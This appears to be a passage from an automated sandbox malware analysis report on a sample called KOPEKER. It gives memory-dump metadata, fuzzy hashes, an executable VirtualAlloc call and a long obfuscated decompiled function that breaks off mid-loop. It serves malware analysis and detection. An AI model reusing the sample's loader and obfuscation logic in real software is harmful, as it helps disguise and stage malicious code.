          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9e6c44e4411dbf8c0d44b76c96dbf881e67621b90bc7e3724d5202f1ae4544f0
          • Instruction ID: 3d3d783de04d9bd84c8762b4cc83add239a96b89d280c620344d085de37c9283
          • Opcode Fuzzy Hash: 9e6c44e4411dbf8c0d44b76c96dbf881e67621b90bc7e3724d5202f1ae4544f0
          • Instruction Fuzzy Hash: 9122234991A70A84EF721060C4C472E6940CF9A345F318F37E861F5ED2B6AF8ADE158B
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 7bf6849d2ddb8ab2fcb7285dc042332aeb21a444acf5da52201d2d5e24a87f19
          • Instruction ID: b9810ff6291ed265c7a76fffa19ad7841be9de656f5f1bde107630360577c517
          • Opcode Fuzzy Hash: 7bf6849d2ddb8ab2fcb7285dc042332aeb21a444acf5da52201d2d5e24a87f19
          • Instruction Fuzzy Hash: 1422BD41A2A70649FFB32060C5D072D6980DF16385F718F3BDD61F59E2A71F86CA2587
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a19f08278bfc5ec7bf5f7de82cdb6fa547dedc714e5e240ea4f7de5a2473b46b
          • Instruction ID: f2694dc10188692c7723b34061aedacccff65e9721982211a673bc8efb9b0a45
          • Opcode Fuzzy Hash: a19f08278bfc5ec7bf5f7de82cdb6fa547dedc714e5e240ea4f7de5a2473b46b
          • Instruction Fuzzy Hash: 8502CD81A2A70689FFB22060C5D072D6980DF16385F718F3BD961F59E2A71FC6CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 5306dbac9099d31a500443cdb0a4e90da15711312e322eb511ea3298ab461031
          • Instruction ID: 905c4a5ff58ce8cf966636413460783836c31987d9e85cb62952d3ad7b795cf6
          • Opcode Fuzzy Hash: 5306dbac9099d31a500443cdb0a4e90da15711312e322eb511ea3298ab461031
          • Instruction Fuzzy Hash: E812CD81A2A70689FFB22060C5D072D6980DF16385F718F3BDC61F59E2A71F86CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d6095b64d3deb815db09c03a68db08d43af6658146fef9f19c4c2454e9bfec21
          • Instruction ID: 0be68db97572ffe2b8a3ff1a3dfdbd631818ea08528e68caa9798eb8c9f89bcb
          • Opcode Fuzzy Hash: d6095b64d3deb815db09c03a68db08d43af6658146fef9f19c4c2454e9bfec21
          • Instruction Fuzzy Hash: 9E02F24291A70249EFB22164C4D072E6990DF16345F35CF3BC861F65E2E72FC5CA269B
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7ea36e7bfaa8e6a33854f728b92ee3f5c8978535c83c4687613cc3df5a453c46
          • Instruction ID: 4f7a6360028a4296e027d493effb5d1e2ebfe06e6e77ef50eea966652f32f433
          • Opcode Fuzzy Hash: 7ea36e7bfaa8e6a33854f728b92ee3f5c8978535c83c4687613cc3df5a453c46
          • Instruction Fuzzy Hash: CD02CC81A2A70689FFB32160C5D071D6980DF16385F718F3BD961F58E2A71F86CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 62%
          			E004129B4(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
          				void* _v5;
          				char _v8;
          				signed int _v16;
          				signed int _v20;
          				intOrPtr _v24;
          				long long* _v28;
          				intOrPtr _v40;
          				long long _v48;
          				intOrPtr _v52;
          				long long _v60;
          				long long _v68;
          				char _v72;
          				long long _v76;
          				void* _v80;
          				void* _v96;
          				signed int _v100;
          				long long _v108;
          				short _v112;
          				short _v116;
          				char _v132;
          				long long _v140;
          				signed int _v144;
          				short _v148;
          				void* _v152;
          				long long _v160;
          				intOrPtr _v164;
          				short _v168;
          				short _v172;
          				long long _v180;
          				long long _v188;
          				short _v192;
          				long long _v200;
          				char _v204;
          				intOrPtr _v208;
          				long long _v212;
          				long long _v220;
          				short _v224;
          				signed int _v228;
          				signed int _v232;
          				long long _v240;
          				intOrPtr _v244;
          				intOrPtr _v248;
          				long long _v252;
          				intOrPtr _v256;
          				long long _v260;
          				intOrPtr _v264;
          				short _v268;
          				short _v272;
          				short _v276;
          				short _v280;
          				short _v284;
          				long long _v292;
          				intOrPtr _v296;
          				long long _v300;
          				intOrPtr _v304;
          				long long _v308;
          				char _v312;
          				char _v316;
          				char _v320;
          				signed int _v324;
          				char _v328;
          				signed int _v336;
          				char _v344;
          				signed int _v352;
          				char _v360;
          				signed int _v368;
          				char _v376;
          				signed int _v384;
          				char _v392;
          				signed int _v400;
          				char _v408;
          				signed int _v416;
          				char _v424;
          				signed int _v432;
          				char _v440;
          				signed int _v444;
          				signed int _v448;
          				char _v456;
          				char* _v480;
          				intOrPtr _v488;
          				intOrPtr _v512;
          				intOrPtr _v520;
          				short _v556;
          				void* _v560;
          				signed int _v564;
          				char _v568;
          				char _v572;
          				intOrPtr _v576;
          				intOrPtr _v580;
          				long long _v584;
          				intOrPtr _v588;
          				long long _v592;
          				signed int _v596;
          				signed int _v600;
          				signed int _v604;
          				signed int _v628;
          				signed int _v632;
          				signed int _v636;
          				signed int _v640;
          				signed int _v644;
          				signed int _v648;
          				signed int _v652;
          				signed int _v656;
          				signed int _v660;
          				signed int _v664;
          				signed int _v668;
          				signed int _v672;
          				signed int _v676;
          				signed int _v680;
          				signed int _v684;
          				signed int _v688;
          				signed int _v692;
          				signed int _v696;
          				signed int _v700;
          				signed int _v704;
          				signed int _v708;
          				signed int _v712;
          				signed int _v716;
          				signed int _v720;
          				signed int _v724;
          				signed int _v728;
          				signed int _v732;
          				signed int _v736;
          				signed int* _v740;
          				signed int _v744;
          				signed int* _v748;
          				signed int _v752;
          				signed int _v756;
          				signed int* _v760;
          				signed int _v764;
          				char* _t984;
          				signed int _t992;
          				signed int _t1003;
          				signed int _t1015;
          				signed int _t1022;
          				signed int _t1027;
          				signed int _t1044;
          				signed int _t1049;
          				signed int _t1068;
          				signed int _t1081;
          				signed int _t1092;
          				signed int _t1095;
          				signed int _t1122;
          				signed int _t1136;
          				signed int _t1156;
          				signed int _t1160;
          				signed int _t1182;
          				signed int _t1189;
          				signed int _t1203;
          				signed int _t1207;
          				signed int _t1213;
          				signed int _t1225;
          				signed int _t1231;
          				signed int _t1248;
          				signed int _t1253;
          				char* _t1261;
          				char* _t1262;
          				char* _t1265;
          				char* _t1269;
          				char* _t1270;
          				short _t1279;
          				char* _t1286;
          				signed int _t1287;
          				signed int _t1293;
          				signed int _t1295;
          				signed int _t1301;
          				signed int _t1302;
          				signed int _t1306;
          				signed int _t1307;
          				signed int _t1311;
          				signed int _t1329;
          				char* _t1333;
          				signed int* _t1338;
          				char* _t1354;
          				signed int* _t1355;
          				signed int _t1358;
          				signed int _t1365;
          				void* _t1367;
          				char* _t1370;
          				char* _t1374;
          				char* _t1376;
          				char* _t1378;
          				void* _t1436;
          				void* _t1439;
          				long long* _t1440;
          				void* _t1441;
          				long long* _t1442;
          				intOrPtr* _t1443;
          				void* _t1444;
          				void* _t1445;
          				signed int _t1451;
          				long long _t1482;
          				long long _t1524;
          
          				_t1367 = __ebx;
          				_t1440 = _t1439 - 0x18;
          				 *[fs:0x0] = _t1440;
          				L004016F0();
          				_v28 = _t1440;
          				_v24 = 0x4011a8;
          				_v20 = _a4 & 0x00000001;
          				_a4 = _a4 & 0xfffffffe;
          				_v16 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4016f6, _t1436);
          				_v8 = 1;
          				_v8 = 2;
          				_v368 = 0x80020004;
          				_v376 = 0xa;
          				_v352 = 0x80020004;
          				_v360 = 0xa;
          				_v336 = 0x80020004;
          				_v344 = 0xa;
          				_push( &_v376);
          				_push( &_v360);
          				_push( &_v344);
          				_t1482 =  *0x401480;
          				_v72 = _t1482;
          				asm("fld1");
          				_v80 = _t1482;
          				asm("fld1");
          				 *_t1440 = _t1482;
          				L00401948();
          				_v188 = _t1482;
          				_push( &_v376);
          				_push( &_v360);
          				_push( &_v344);
          				_push(3);
          				L00401942();
          				_t1441 = _t1440 + 0x10;
          				_v8 = 3;
          				_v384 = 5;
          				_v392 = 2;
          				_v368 = 0x63;
          				_v376 = 2;
          				_t31 =  &_v352;
          				 *_t31 = _v352 & 0x00000000;
          				_v360 = 2;
          				_v336 = 0x64;
          				_v344 = 2;
          				_push( &_v392);
          				_push( &_v376);
          				_push( &_v360);
          				_push( &_v344);
          				_push( &_v408);
          				L0040192A();
          				_push( &_v408);
          				_t984 =  &_v312;
          				_push(_t984);
          				L00401930();
          				_push(_t984);
          				L00401936();
          				L0040193C();
          				asm("fcomp qword [0x401478]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if( *_t31 == 0) {
          					_t44 =  &_v632;
          					 *_t44 = _v632 & 0x00000000;
          					__eflags =  *_t44;
          				} else {
          					_v632 = 1;
          				}
          				_v596 =  ~_v632;
          				_t1370 =  &_v312;
          				L00401924();
          				_push( &_v408);
          				_push( &_v392);
          				_push( &_v376);
          				_push( &_v360);
          				_push( &_v344);
          				_push(5);
          				L00401942();
          				_t1442 = _t1441 + 0x18;
          				_t992 = _v596;
          				if(_t992 != 0) {
          					_v8 = 4;
          					_v8 = 5;
          					_push(0);
          					_push(L"Filmselskabets");
          					_push( &_v344);
          					L00401918();
          					_t992 = 0x10;
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push(_v52);
          					L0040191E();
          					_t1370 =  &_v344;
          					L00401912();
          				}
          				_v8 = 7;
          				_push(0x411a30);
          				L0040190C();
          				if(_t992 != 0x61) {
          					_v8 = 8;
          					_t1365 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0x73);
          					asm("fclex");
          					_v596 = _t1365;
          					_t1451 = _v596;
          					if(_t1451 >= 0) {
          						_t71 =  &_v636;
          						 *_t71 = _v636 & 0x00000000;
          						__eflags =  *_t71;
          					} else {
          						_push(0x254);
          						_push(0x4105b8);
          						_push(_a4);
          						_push(_v596);
          						L00401906();
          						_v636 = _t1365;
          					}
          				}
          				_v8 = 0xa;
          				_v352 = 0x80020004;
          				_v360 = 0xa;
          				_v336 = 0x80020004;
          				_v344 = 0xa;
          				_push( &_v360);
          				_push( &_v344);
          				asm("fld1");
          				_push(_t1370);
          				_push(_t1370);
          				_v140 = _t1482;
          				asm("fld1");
          				_push(_t1370);
          				_push(_t1370);
          				_v148 = _t1482;
          				asm("fld1");
          				_push(_t1370);
          				_push(_t1370);
          				 *_t1442 = _t1482;
          				L00401900();
          				L0040193C();
          				asm("fcomp qword [0x401470]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if(_t1451 == 0) {
          					_t81 =  &_v640;
          					 *_t81 = _v640 & 0x00000000;
          					__eflags =  *_t81;
          				} else {
          					_v640 = 1;
          				}
          				_v596 =  ~_v640;
          				_push( &_v360);
          				_push( &_v344);
          				_push(2);
          				L00401942();
          				_t1443 = _t1442 + 0xc;
          				if(_v596 != 0) {
          					_v8 = 0xb;
          					_v8 = 0xc;
          					_v448 = _a4;
          					_v456 = 9;
          					_v480 = L"solicit";
          					_v488 = 8;
          					_v512 = 0x58e1c9;
          					_v520 = 3;
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0x10);
          					L004016F0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(3);
          					_push(L"NzXRmXMzPSdU58");
          					_push(_v244);
          					L004018FA();
          					_t1443 = _t1443 + 0x3c;
          				}
          				_v8 = 0xe;
          				_t1003 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
          				_v596 = _t1003;
          				if(_v596 >= 0) {
          					_t111 =  &_v644;
          					 *_t111 = _v644 & 0x00000000;
          					__eflags =  *_t111;
          				} else {
          					_push(0x718);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v644 = _t1003;
          				}
          				_v80 = _v564;
          				_v8 = 0xf;
          				 *((intOrPtr*)( *_a4 + 0x738))(_a4);
          				_v8 = 0x10;
          				_v556 = 0x41cc;
          				 *((intOrPtr*)( *_a4 + 0x74c))(_a4, L"samtaleemnetsrhes",  &_v556, 0x75dd00, 0x6d83);
          				_v8 = 0x11;
          				_v584 =  *0x401468;
          				_t1015 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x8904d3f8,  &_v584, 0x6cab, 0x98e72e79,  &_v592);
          				_v596 = _t1015;
          				if(_v596 >= 0) {
          					_t137 =  &_v648;
          					 *_t137 = _v648 & 0x00000000;
          					__eflags =  *_t137;
          				} else {
          					_push(0x708);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v648 = _t1015;
          				}
          				_v76 = _v592;
          				_v72 = _v588;
          				_v8 = 0x12;
          				_v584 =  *0x401460;
          				_t1022 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x717675,  &_v584, 0x3f22, 0x98e72e79,  &_v592);
          				_v596 = _t1022;
          				if(_v596 >= 0) {
          					_t155 =  &_v652;
          					 *_t155 = _v652 & 0x00000000;
          					__eflags =  *_t155;
          				} else {
          					_push(0x708);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v652 = _t1022;
          				}
          				_v260 = _v592;
          				_v256 = _v588;
          				_v8 = 0x13;
          				_t1027 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
          				_v596 = _t1027;
          				if(_v596 >= 0) {
          					_t170 =  &_v656;
          					 *_t170 = _v656 & 0x00000000;
          					__eflags =  *_t170;
          				} else {
          					_push(0x6f8);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v656 = _t1027;
          				}
          				_v8 = 0x14;
          				_v556 = 0x1854;
          				_v584 =  *0x401458;
          				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x8904d3f8,  &_v556,  &_v592);
          				_v60 = _v592;
          				_v8 = 0x15;
          				_v556 = 0x5bd9;
          				_v584 =  *0x401450;
          				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
          				_v276 = _v560;
          				_v8 = 0x16;
          				_t1044 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
          				_v596 = _t1044;
          				if(_v596 >= 0) {
          					_t204 =  &_v660;
          					 *_t204 = _v660 & 0x00000000;
          					__eflags =  *_t204;
          				} else {
          					_push(0x6fc);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v660 = _t1044;
          				}
          				_v148 = _v556;
          				_v8 = 0x17;
          				_t1049 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
          				_v596 = _t1049;
          				if(_v596 >= 0) {
          					_t218 =  &_v664;
          					 *_t218 = _v664 & 0x00000000;
          					__eflags =  *_t218;
          				} else {
          					_push(0x718);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v664 = _t1049;
          				}
          				_v228 = _v564;
          				_v8 = 0x18;
          				L004018F4();
          				_v556 = 0x5b73;
          				 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
          				_v68 = _v584;
          				L00401924();
          				_v8 = 0x19;
          				_v556 = 0x44eb;
          				_v584 =  *0x401448;
          				 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0x98e72e79,  &_v556,  &_v592);
          				_v240 = _v592;
          				_v8 = 0x1a;
          				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
          				_v180 = _v584;
          				_v8 = 0x1b;
          				_t1068 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
          				_v596 = _t1068;
          				if(_v596 >= 0) {
          					_t261 =  &_v668;
          					 *_t261 = _v668 & 0x00000000;
          					__eflags =  *_t261;
          				} else {
          					_push(0x6f8);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v668 = _t1068;
          				}
          				_v8 = 0x1c;
          				L004018F4();
          				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x1bd458,  &_v312, 0x5dfa,  &_v584);
          				_v108 = _v584;
          				_t1374 =  &_v312;
          				L00401924();
          				_v8 = 0x1d;
          				_v564 = 0x98e72e79;
          				_v584 =  *0x401440;
          				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v584, 0x53f0,  &_v564, 0x63dcbf);
          				_v8 = 0x1e;
          				_t1081 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
          				_v596 = _t1081;
          				if(_v596 >= 0) {
          					_t290 =  &_v672;
          					 *_t290 = _v672 & 0x00000000;
          					__eflags =  *_t290;
          				} else {
          					_push(0x6f8);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v672 = _t1081;
          				}
          				_v8 = 0x1f;
          				_v556 = 0x66dc;
          				_v400 =  *0x401438;
          				 *((intOrPtr*)( *_a4 + 0x734))(_a4,  &_v556, _t1374, 0x8904d3f8,  &_v584);
          				_v308 = _v584;
          				_v304 = _v580;
          				_v8 = 0x20;
          				_v564 = 0x8904d3f8;
          				_v432 =  *0x401430;
          				_t1092 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1374, _t1374,  &_v564, 0xf1, 0xcdba990, 0x5b00);
          				_v596 = _t1092;
          				if(_v596 >= 0) {
          					_t314 =  &_v676;
          					 *_t314 = _v676 & 0x00000000;
          					__eflags =  *_t314;
          				} else {
          					_push(0x70c);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v676 = _t1092;
          				}
          				_v8 = 0x21;
          				_t1095 =  *((intOrPtr*)( *_a4 + 0x700))(_a4);
          				_v596 = _t1095;
          				if(_v596 >= 0) {
          					_t325 =  &_v680;
          					 *_t325 = _v680 & 0x00000000;
          					__eflags =  *_t325;
          				} else {
          					_push(0x700);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v680 = _t1095;
          				}
          				_v8 = 0x22;
          				_v556 = 0x86;
          				 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x86,  &_v556, 0x5b0c);
          				_v8 = 0x23;
          				_v584 =  *0x401428;
          				 *_t1443 =  *0x401420;
          				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x462b,  &_v584, _t1374,  &_v556);
          				_v272 = _v556;
          				_v8 = 0x24;
          				_v556 = 0x59;
          				_v584 =  *0x401418;
          				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x5b0c,  &_v584,  &_v556,  &_v560);
          				_v116 = _v560;
          				_v8 = 0x25;
          				_v584 =  *0x401410;
          				 *_t1443 =  *0x401408;
          				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x69,  &_v584, _t1374,  &_v556);
          				_v268 = _v556;
          				_v8 = 0x26;
          				_v564 = 0x98e72e79;
          				 *_t1443 =  *0x401400;
          				_t1122 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1374, _t1374,  &_v564, 0x12, 0xb33c5640, 0x5b05);
          				_v596 = _t1122;
          				if(_v596 >= 0) {
          					_t373 =  &_v684;
          					 *_t373 = _v684 & 0x00000000;
          					__eflags =  *_t373;
          				} else {
          					_push(0x70c);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v684 = _t1122;
          				}
          				_v8 = 0x27;
          				_v596 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
          				if(_v596 >= 0) {
          					_v688 = _v688 & 0x00000000;
          				} else {
          					_push(0x6f8);
          					_push(0x4105e8);
          					if(_t1367 + _t1367 == 0) {
          						_push(_v596);
          						L00401906();
          					}
          					asm("jecxz 0x0");
          					 *((intOrPtr*)(_t1374 - 0x2ab7b)) =  *((intOrPtr*)(_t1374 - 0x2ab7b)) - 1;
          					asm("invalid");
          					_pop(es);
          				}
          				_v8 = 0x28;
          				_v556 = 0x1a82;
          				_v584 =  *0x4013f8;
          				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x596b,  &_v584,  &_v556,  &_v560);
          				_v112 = _v560;
          				_v8 = 0x29;
          				_v564 = 0x2329eb;
          				_t399 =  &_v564; // 0x2329eb
          				_v592 =  *0x4013f0;
          				_t1136 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1374, _t1374, _t399, 0x9d, 0x3b889c20, 0x5b06);
          				_v596 = _t1136;
          				if(_v596 >= 0) {
          					_t408 =  &_v692;
          					 *_t408 = _v692 & 0x00000000;
          					__eflags =  *_t408;
          				} else {
          					_push(0x70c);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v692 = _t1136;
          				}
          				_v8 = 0x2a;
          				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
          				_v140 = _v584;
          				_v8 = 0x2b;
          				_v556 = 0x1fe;
          				_v584 =  *0x4013e8;
          				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x1d56,  &_v584,  &_v556,  &_v560);
          				_v224 = _v560;
          				_v8 = 0x2c;
          				_v556 = 0x37b;
          				_v564 =  *0x4013e0;
          				_v632 =  *0x4013d8;
          				_t432 =  &_v564; // 0x2329eb
          				 *((intOrPtr*)( *_a4 + 0x758))(_a4, _t432, 0xdbe6dc20, 0x5af4,  &_v556, _t1374, _t1374);
          				_v8 = 0x2d;
          				_t1156 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
          				_v596 = _t1156;
          				if(_v596 >= 0) {
          					_t446 =  &_v696;
          					 *_t446 = _v696 & 0x00000000;
          					__eflags =  *_t446;
          				} else {
          					_push(0x6fc);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v696 = _t1156;
          				}
          				_v192 = _v556;
          				_v8 = 0x2e;
          				_t1160 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
          				_v596 = _t1160;
          				if(_v596 >= 0) {
          					_t459 =  &_v700;
          					 *_t459 = _v700 & 0x00000000;
          					__eflags =  *_t459;
          				} else {
          					_push(0x6f8);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v700 = _t1160;
          				}
          				_v8 = 0x2f;
          				L004018F4();
          				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x8904d3f8,  &_v312, 0x742e,  &_v584);
          				_v220 = _v584;
          				_t1376 =  &_v312;
          				L00401924();
          				_v8 = 0x30;
          				_v564 = 0x8904d3f8;
          				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v564, 0x98e72e79,  &_v584);
          				_v212 = _v584;
          				_v208 = _v580;
          				_v8 = 0x31;
          				_v584 =  *0x4013d0;
          				_v708 =  *0x4013c8;
          				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x3a20,  &_v584, _t1376,  &_v556);
          				_v172 = _v556;
          				_v8 = 0x32;
          				_t1182 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v584);
          				_v596 = _t1182;
          				if(_v596 >= 0) {
          					_t501 =  &_v704;
          					 *_t501 = _v704 & 0x00000000;
          					__eflags =  *_t501;
          				} else {
          					_push(0x710);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v704 = _t1182;
          				}
          				_v252 = _v584;
          				_v248 = _v580;
          				_v8 = 0x33;
          				_v584 =  *0x4013c0;
          				_t1189 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x98e72e79,  &_v584, 0x3457, 0x98e72e79,  &_v592);
          				_v596 = _t1189;
          				if(_v596 >= 0) {
          					_t519 =  &_v708;
          					 *_t519 = _v708 & 0x00000000;
          					__eflags =  *_t519;
          				} else {
          					_push(0x708);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v708 = _t1189;
          				}
          				_v300 = _v592;
          				_v296 = _v588;
          				_v8 = 0x34;
          				_v584 =  *0x4013b8;
          				_v760 =  *0x4013b4;
          				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x2821,  &_v584, _t1376,  &_v556);
          				_v168 = _v556;
          				_v8 = 0x35;
          				_v556 = 0x4ea1;
          				_v564 = 0x8904d3f8;
          				_t1203 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v564,  &_v556,  &_v568);
          				_v596 = _t1203;
          				if(_v596 >= 0) {
          					_t548 =  &_v712;
          					 *_t548 = _v712 & 0x00000000;
          					__eflags =  *_t548;
          				} else {
          					_push(0x714);
          					_push(0x4105e8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v712 = _t1203;
          				}
          				_v204 = _v568;
          				_v8 = 0x36;
          				L004018EE();
          				_v8 = 0x37;
          				_t1207 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v556, 0xffffffff);
          				asm("fclex");
          				_v596 = _t1207;
          				if(_v596 >= 0) {
          					_t563 =  &_v716;
          					 *_t563 = _v716 & 0x00000000;
          					__eflags =  *_t563;
          				} else {
          					_push(0x1b8);
          					_push(0x4105b8);
          					_push(_a4);
          					_push(_v596);
          					L00401906();
          					_v716 = _t1207;
          				}
          				_t1213 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
          				asm("fclex");
          				_v600 = _t1213;
          				if(_v600 >= 0) {
          					_t574 =  &_v720;
          					 *_t574 = _v720 & 0x00000000;
          					__eflags =  *_t574;
          				} else {
          					_push(0x1bc);
          					_push(0x4105b8);
          					_push(_a4);
          					_push(_v600);
          					L00401906();
          					_v720 = _t1213;
          				}
          				_v8 = 0x38;
          				_v448 = _v448 & 0x00000000;
          				_v444 = _v444 & 0x00000000;
          				_v456 = 6;
          				L004018E8();
          				while(1) {
          					_v8 = 0x3a;
          					_v448 = 1;
          					_v456 = 2;
          					L004018E2();
          					_t1378 =  &_v132;
          					L004018E8();
          					_v8 = 0x3b;
          					_v556 = 0x1e2c;
          					_v564 =  *0x4013b0;
          					 *_t1443 =  *0x4013a8;
          					 *((intOrPtr*)( *_a4 + 0x758))(_a4,  &_v564, 0x539a9640, 0x5af4,  &_v556, _t1378, _t1378,  &_v344,  &_v456,  &_v132);
          					_v8 = 0x3c;
          					_t1225 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v564);
          					_v596 = _t1225;
